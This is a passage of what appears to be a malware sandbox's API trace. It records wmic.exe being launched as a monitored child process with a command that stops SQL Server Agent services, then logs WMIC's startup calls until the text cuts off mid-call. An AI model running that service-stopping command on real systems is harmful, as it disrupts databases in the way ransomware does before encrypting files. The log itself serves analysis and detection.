(_Block=0x4385c0) Thread: id = 126 os_tid = 0x224 Thread: id = 127 os_tid = 0x760 Thread: id = 128 os_tid = 0x5b4 Thread: id = 129 os_tid = 0x614 Thread: id = 130 os_tid = 0x4e8 Process: id = "16" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x696f3000" os_pid = "0xadc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 146 os_tid = 0xb70 [0242.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafa90 | out: lpSystemTimeAsFileTime=0xafa90*(dwLowDateTime=0xa6863640, dwHighDateTime=0x1d61d49)) [0242.887] GetCurrentProcessId () returned 0xadc [0242.887] GetCurrentThreadId () returned 0xb70 [0242.887] GetTickCount () returned 0x11668b2 [0242.887] QueryPerformanceCounter (in: lpPerformanceCount=0xafa98 | out: lpPerformanceCount=0xafa98*=36306057904) returned 1 [0242.891] GetModuleHandleW (lpModuleName=0x0) returned 0xffde0000 [0242.891] __set_app_type (_Type=0x1) [0242.891] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe2ced0) returned 0x0 [0242.891] __wgetmainargs (in: _Argc=0xffe52380, _Argv=0xffe52390, _Env=0xffe52388, _DoWildCard=0, _StartInfo=0xffe5239c | out: _Argc=0xffe52380, _Argv=0xffe52390, _Env=0xffe52388) returned 0 [0242.893] ??0CHString@@QEAA@XZ () returned 0xffe52ab0 [0242.893] malloc (_Size=0x30) returned 0x475a80 [0242.893] malloc (_Size=0x70) returned 0x477da0 [0242.893] malloc (_Size=0x50) returned 0x475ac0 [0242.893] malloc (_Size=0x30) returned 0x477e20 [0242.893] malloc (_Size=0x48) returned 0x477e60 [0242.893] malloc (_Size=0x30) returned 0x477eb0 [0242.893] malloc (_Size=0x30) returned 0x477ef0 [0242.893] ??0CHString@@QEAA@XZ () returned 0xffe52f58 [0242.893] malloc (_Size=0x30) returned 0x477f30 [0242.893] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0242.893] SetConsoleCtrlHandler (HandlerRoutine=0xffe25724, Add=1) returned 1 [0242.893] _onexit (_Func=0xffe3f378) returned 0xffe3f378 [0242.894] _onexit (_Func=0xffe3f490) returned 0xffe3f490 [0242.894] _onexit (_Func=0xffe3f4d0) returned 0xffe3f4d0 [0242.894] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0242.894] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0242.917] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0242.929] CoCreateInstance (in: rclsid=0xffde73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffde7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffe52940 | out: ppv=0xffe52940*=0x1bd1390) returned 0x0 [0242.943] GetCurrentProcess () returned 0xffffffffffffffff [0242.943] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xaf860 | out: TokenHandle=0xaf860*=0xf4) returned 1 [0242.943] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaf858 | out: TokenInformation=0x0, ReturnLength=0xaf858) returned 0 [0242.943] malloc (_Size=0x118) returned 0x476980 [0242.943] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x476980, TokenInformationLength=0x118, ReturnLength=0xaf858 | out: TokenInformation=0x476980, ReturnLength=0xaf858) returned 1 [0242.943] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x476980*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=542368772, Attributes=0xf3cd), (Luid.LowPart=0x0, Luid.HighPart=4685680, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0242.943] free (_Block=0x476980) [0242.943] CloseHandle (hObject=0xf4) returned 1 [0242.943] malloc (_Size=0x40) returned 0x477f70 [0242.944] malloc (_Size=0x40) returned 0x476980 [0242.944] malloc (_Size=0x40) returned 0x4769d0 [0242.944] malloc (_Size=0x20a) returned 0x476a20 [0242.944] GetSystemDirectoryW (in: lpBuffer=0x476a20, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0242.944] free (_Block=0x476a20) [0242.944] malloc (_Size=0x18) returned 0x476a20 [0242.944] malloc (_Size=0x18) returned 0x476a40 [0242.944] malloc (_Size=0x18) returned 0x476a60 [0242.944] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0242.944] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0242.944] free (_Block=0x476a20) [0242.944] free (_Block=0x476a40) [0242.944] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0242.945] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0242.945] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0242.946] FreeLibrary (hLibModule=0x77940000) returned 1 [0242.946] free (_Block=0x476a60) [0242.946] _vsnwprintf (in: _Buffer=0x4769d0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xaf488 | out: _Buffer="ms_409") returned 6 [0242.946] malloc (_Size=0x20) returned 0x476a20 [0242.946] GetComputerNameW (in: lpBuffer=0x476a20, nSize=0xaf860 | out: lpBuffer="XDUWTFONO", nSize=0xaf860) returned 1 [0242.946] lstrlenW (lpString="XDUWTFONO") returned 9 [0242.946] malloc (_Size=0x14) returned 0x476a50 [0242.946] lstrlenW (lpString="XDUWTFONO") returned 9 [0242.947] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xaf858 | out: lpNameBuffer=0x0, nSize=0xaf858) returned 0x7fffffde000 [0242.948] GetLastError () returned 0xea [0242.948] malloc (_Size=0x40) returned 0x476a70 [0242.948] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x476a70, nSize=0xaf858 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xaf858) returned 0x1 [0242.948] lstrlenW (lpString="") returned 0 [0242.948] lstrlenW (lpString="XDUWTFONO") returned 9 [0242.948] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0242.951] lstrlenW (lpString=".") returned 1 [0242.951] lstrlenW (lpString="XDUWTFONO") returned 9 [0242.951] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0242.951] lstrlenW (lpString="LOCALHOST") returned 9 [0242.951] lstrlenW (lpString="XDUWTFONO") returned 9 [0242.951] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0242.951] lstrlenW (lpString="XDUWTFONO") returned 9 [0242.951] lstrlenW (lpString="XDUWTFONO") returned 9 [0242.951] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0242.951] free (_Block=0x476a50) [0242.951] lstrlenW (lpString="XDUWTFONO") returned 9 [0242.951] malloc (_Size=0x14) returned 0x476a50 [0242.951] lstrlenW (lpString="XDUWTFONO") returned 9 [0242.951] lstrlenW (lpString="XDUWTFONO") returned 9 [0242.951] malloc (_Size=0x14) returned 0x476ac0 [0242.951] lstrlenW (lpString="XDUWTFONO") returned 9 [0242.951] malloc (_Size=0x8) returned 0x476ae0 [0242.951] malloc (_Size=0x18) returned 0x476b00 [0242.952] malloc (_Size=0x30) returned 0x476b20 [0242.952] malloc (_Size=0x18) returned 0x476b60 [0242.952] SysStringLen (param_1="IDENTIFY") returned 0x8 [0242.952] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0242.952] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0242.952] SysStringLen (param_1="IDENTIFY") returned 0x8 [0242.952] malloc (_Size=0x30) returned 0x476b80 [0242.952] malloc (_Size=0x18) returned 0x476bc0 [0242.952] SysStringLen (param_1="IMPERSONATE") returned 0xb [0242.952] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0242.952] SysStringLen (param_1="IMPERSONATE") returned 0xb [0242.952] SysStringLen (param_1="IDENTIFY") returned 0x8 [0242.952] SysStringLen (param_1="IDENTIFY") returned 0x8 [0242.952] SysStringLen (param_1="IMPERSONATE") returned 0xb [0242.952] malloc (_Size=0x30) returned 0x476be0 [0242.952] malloc (_Size=0x18) returned 0x476c20 [0242.952] SysStringLen (param_1="DELEGATE") returned 0x8 [0242.952] SysStringLen (param_1="IDENTIFY") returned 0x8 [0242.952] SysStringLen (param_1="DELEGATE") returned 0x8 [0242.952] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0242.952] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0242.952] SysStringLen (param_1="DELEGATE") returned 0x8 [0242.952] malloc (_Size=0x30) returned 0x476c40 [0242.953] malloc (_Size=0x18) returned 0x476c80 [0242.953] malloc (_Size=0x30) returned 0x476ca0 [0242.953] malloc (_Size=0x18) returned 0x476ce0 [0242.953] SysStringLen (param_1="NONE") returned 0x4 [0242.953] SysStringLen (param_1="DEFAULT") returned 0x7 [0242.953] SysStringLen (param_1="DEFAULT") returned 0x7 [0242.953] SysStringLen (param_1="NONE") returned 0x4 [0242.953] malloc (_Size=0x30) returned 0x476d00 [0242.953] malloc (_Size=0x18) returned 0x476d40 [0242.953] SysStringLen (param_1="CONNECT") returned 0x7 [0242.953] SysStringLen (param_1="DEFAULT") returned 0x7 [0242.953] malloc (_Size=0x30) returned 0x476d60 [0242.953] malloc (_Size=0x18) returned 0x476da0 [0242.953] SysStringLen (param_1="CALL") returned 0x4 [0242.953] SysStringLen (param_1="DEFAULT") returned 0x7 [0242.953] SysStringLen (param_1="CALL") returned 0x4 [0242.953] SysStringLen (param_1="CONNECT") returned 0x7 [0242.953] malloc (_Size=0x30) returned 0x476dc0 [0242.953] malloc (_Size=0x18) returned 0x476e00 [0242.953] SysStringLen (param_1="PKT") returned 0x3 [0242.953] SysStringLen (param_1="DEFAULT") returned 0x7 [0242.953] SysStringLen (param_1="PKT") returned 0x3 [0242.953] SysStringLen (param_1="NONE") returned 0x4 [0242.953] SysStringLen (param_1="NONE") returned 0x4 [0242.954] SysStringLen (param_1="PKT") returned 0x3 [0242.954] malloc (_Size=0x30) returned 0x476e20 [0242.954] malloc (_Size=0x18) returned 0x476e60 [0242.954] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0242.954] SysStringLen (param_1="DEFAULT") returned 0x7 [0242.954] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0242.954] SysStringLen (param_1="NONE") returned 0x4 [0242.954] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0242.954] SysStringLen (param_1="PKT") returned 0x3 [0242.954] SysStringLen (param_1="PKT") returned 0x3 [0242.954] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0242.954] malloc (_Size=0x30) returned 0x478000 [0242.955] malloc (_Size=0x18) returned 0x476e80 [0242.955] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0242.955] SysStringLen (param_1="DEFAULT") returned 0x7 [0242.955] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0242.955] SysStringLen (param_1="PKT") returned 0x3 [0242.955] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0242.955] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0242.955] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0242.955] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0242.955] malloc (_Size=0x30) returned 0x478040 [0242.955] malloc (_Size=0x40) returned 0x476ea0 [0242.955] malloc (_Size=0x20a) returned 0x476ef0 [0242.955] GetSystemDirectoryW (in: lpBuffer=0x476ef0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0242.956] free (_Block=0x476ef0) [0242.956] malloc (_Size=0x18) returned 0x476ef0 [0242.956] malloc (_Size=0x18) returned 0x476f10 [0242.956] malloc (_Size=0x18) returned 0x476f30 [0242.956] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0242.956] SysStringLen (param_1="\\wbem\\") returned 0x6 [0242.956] free (_Block=0x476ef0) [0242.956] free (_Block=0x476f10) [0242.956] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0242.956] free (_Block=0x476f30) [0242.956] malloc (_Size=0x18) returned 0x476ef0 [0242.956] malloc (_Size=0x18) returned 0x476f10 [0242.956] malloc (_Size=0x18) returned 0x476f30 [0242.956] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0242.956] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0242.956] free (_Block=0x476ef0) [0242.957] free (_Block=0x476f10) [0242.957] GetCurrentThreadId () returned 0xb70 [0242.957] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xaf160 | out: phkResult=0xaf160*=0xf8) returned 0x0 [0242.957] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xaf1b0, lpcbData=0xaf150*=0x400 | out: lpType=0x0, lpData=0xaf1b0*=0x30, lpcbData=0xaf150*=0x4) returned 0x0 [0242.957] _wcsicmp (_String1="0", _String2="1") returned -1 [0242.957] _wcsicmp (_String1="0", _String2="2") returned -2 [0242.957] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xaf150*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xaf150*=0x42) returned 0x0 [0242.957] malloc (_Size=0x86) returned 0x476f50 [0242.957] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x476f50, lpcbData=0xaf150*=0x42 | out: lpType=0x0, lpData=0x476f50*=0x25, lpcbData=0xaf150*=0x42) returned 0x0 [0242.957] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0242.957] malloc (_Size=0x42) returned 0x476fe0 [0242.957] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0242.957] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xaf1b0, lpcbData=0xaf150*=0x400 | out: lpType=0x0, lpData=0xaf1b0*=0x36, lpcbData=0xaf150*=0xc) returned 0x0 [0242.957] _wtol (_String="65536") returned 65536 [0242.957] free (_Block=0x476f50) [0242.957] RegCloseKey (hKey=0x0) returned 0x6 [0242.957] CoCreateInstance (in: rclsid=0xffde7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffde73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xaf658 | out: ppv=0xaf658*=0x1c771d0) returned 0x0 [0242.976] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1c771d0, xmlSource=0xaf7a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x476ef0), isSuccessful=0xaf810 | out: isSuccessful=0xaf810*=0xffff) returned 0x0 [0243.150] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1c771d0, DOMElement=0xaf650 | out: DOMElement=0xaf650*=0x1c7bc50) returned 0x0 [0243.151] malloc (_Size=0x18) returned 0x47c560 [0243.151] IXMLDOMElement:getElementsByTagName (in: This=0x1c7bc50, tagName="XSLFORMAT", resultList=0xaf660 | out: resultList=0xaf660*=0x1c79cc0) returned 0x0 [0243.152] free (_Block=0x47c560) [0243.152] IXMLDOMNodeList:get_length (in: This=0x1c79cc0, listLength=0xaf828 | out: listLength=0xaf828*=21) returned 0x0 [0243.152] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=0, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.152] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="texttable.xsl") returned 0x0 [0243.152] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.153] malloc (_Size=0x18) returned 0x47c560 [0243.153] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.153] free (_Block=0x47c560) [0243.153] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0243.153] malloc (_Size=0x18) returned 0x47c560 [0243.153] malloc (_Size=0x18) returned 0x47c580 [0243.153] malloc (_Size=0x30) returned 0x478080 [0243.153] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.153] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.153] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.153] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=1, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.153] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="textvaluelist.xsl") returned 0x0 [0243.153] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.154] malloc (_Size=0x18) returned 0x47c5a0 [0243.154] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.154] free (_Block=0x47c5a0) [0243.154] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0243.154] malloc (_Size=0x18) returned 0x47c5a0 [0243.154] malloc (_Size=0x18) returned 0x47c5c0 [0243.154] SysStringLen (param_1="VALUE") returned 0x5 [0243.154] SysStringLen (param_1="TABLE") returned 0x5 [0243.154] SysStringLen (param_1="TABLE") returned 0x5 [0243.154] SysStringLen (param_1="VALUE") returned 0x5 [0243.154] malloc (_Size=0x30) returned 0x4780c0 [0243.154] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.154] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.154] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.154] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=2, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.154] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="textvaluelist.xsl") returned 0x0 [0243.154] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.154] malloc (_Size=0x18) returned 0x47c5e0 [0243.155] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.155] free (_Block=0x47c5e0) [0243.155] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0243.155] malloc (_Size=0x18) returned 0x47c5e0 [0243.155] malloc (_Size=0x18) returned 0x47c600 [0243.155] SysStringLen (param_1="LIST") returned 0x4 [0243.155] SysStringLen (param_1="TABLE") returned 0x5 [0243.155] malloc (_Size=0x30) returned 0x478100 [0243.155] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.155] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.155] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.155] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=3, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.155] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="rawxml.xsl") returned 0x0 [0243.155] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.155] malloc (_Size=0x18) returned 0x47c620 [0243.155] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.155] free (_Block=0x47c620) [0243.155] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0243.156] malloc (_Size=0x18) returned 0x47c620 [0243.156] malloc (_Size=0x18) returned 0x47c640 [0243.156] SysStringLen (param_1="RAWXML") returned 0x6 [0243.156] SysStringLen (param_1="TABLE") returned 0x5 [0243.156] SysStringLen (param_1="RAWXML") returned 0x6 [0243.156] SysStringLen (param_1="LIST") returned 0x4 [0243.156] SysStringLen (param_1="LIST") returned 0x4 [0243.156] SysStringLen (param_1="RAWXML") returned 0x6 [0243.156] malloc (_Size=0x30) returned 0x478140 [0243.156] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.156] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.156] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.156] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=4, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.156] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="htable.xsl") returned 0x0 [0243.156] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.156] malloc (_Size=0x18) returned 0x47c660 [0243.156] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.156] free (_Block=0x47c660) [0243.156] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0243.156] malloc (_Size=0x18) returned 0x47c660 [0243.157] malloc (_Size=0x18) returned 0x47c680 [0243.157] SysStringLen (param_1="HTABLE") returned 0x6 [0243.157] SysStringLen (param_1="TABLE") returned 0x5 [0243.157] SysStringLen (param_1="HTABLE") returned 0x6 [0243.157] SysStringLen (param_1="LIST") returned 0x4 [0243.157] malloc (_Size=0x30) returned 0x478180 [0243.157] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.157] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.157] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.157] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=5, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.157] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="hform.xsl") returned 0x0 [0243.157] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.157] malloc (_Size=0x18) returned 0x47c6a0 [0243.157] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.158] free (_Block=0x47c6a0) [0243.158] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0243.158] malloc (_Size=0x18) returned 0x47c6a0 [0243.158] malloc (_Size=0x18) returned 0x47c6c0 [0243.158] SysStringLen (param_1="HFORM") returned 0x5 [0243.158] SysStringLen (param_1="TABLE") returned 0x5 [0243.158] SysStringLen (param_1="HFORM") returned 0x5 [0243.158] SysStringLen (param_1="LIST") returned 0x4 [0243.158] SysStringLen (param_1="HFORM") returned 0x5 [0243.158] SysStringLen (param_1="HTABLE") returned 0x6 [0243.158] malloc (_Size=0x30) returned 0x4781c0 [0243.158] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.158] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.158] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.158] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=6, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.159] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="xml.xsl") returned 0x0 [0243.159] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.159] malloc (_Size=0x18) returned 0x47c6e0 [0243.159] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.159] free (_Block=0x47c6e0) [0243.159] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0243.159] malloc (_Size=0x18) returned 0x47c6e0 [0243.159] malloc (_Size=0x18) returned 0x47c700 [0243.159] SysStringLen 